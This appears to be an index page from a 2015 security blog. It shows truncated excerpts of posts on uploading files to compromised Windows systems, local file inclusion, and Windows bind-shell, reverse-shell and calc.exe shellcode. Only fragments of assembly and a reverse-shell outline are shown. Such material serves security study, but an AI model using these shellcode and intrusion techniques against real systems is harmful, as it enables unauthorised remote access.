Uploading files to compromised systems

Written by  on October 21, 2015

The windows debug method Windows has a program called debug, this program can actually convert hex machine code to an executable or whatever. The windows[...]

LFI: beyond /proc/self/environ

Written by  on October 19, 2015

Let’s suppose that we have a simple php application. The web app has a login form and a small news system based on txt files. So a user can simple[...]

Windows bind shell universal shellcode

Written by  on September 26, 2015

.386 .model flat,stdcall .data .code start: assume fs:nothing ; ———————————————— ;[...]

Windows reverse shell universal shellcode

Written by  on August 29, 2015

Here it goes: 1) resolve needed functions from kernel 32 and push them on the stack 2) load & initialize winsock library 3) create a socket and connect[...]

WinExec calc.exe universal shellcode

Written by  on August 21, 2015

ASM: PUSH ESI ; LOCATE KERNEL32 BASE ADDR XOR EAX,EAX MOV EAX,DWORD PTR FS:[EAX+30] MOV EAX,DWORD PTR DS:[EAX+C] MOV ESI,DWORD PTR DS:[EAX+1C] LODS DWORD[...]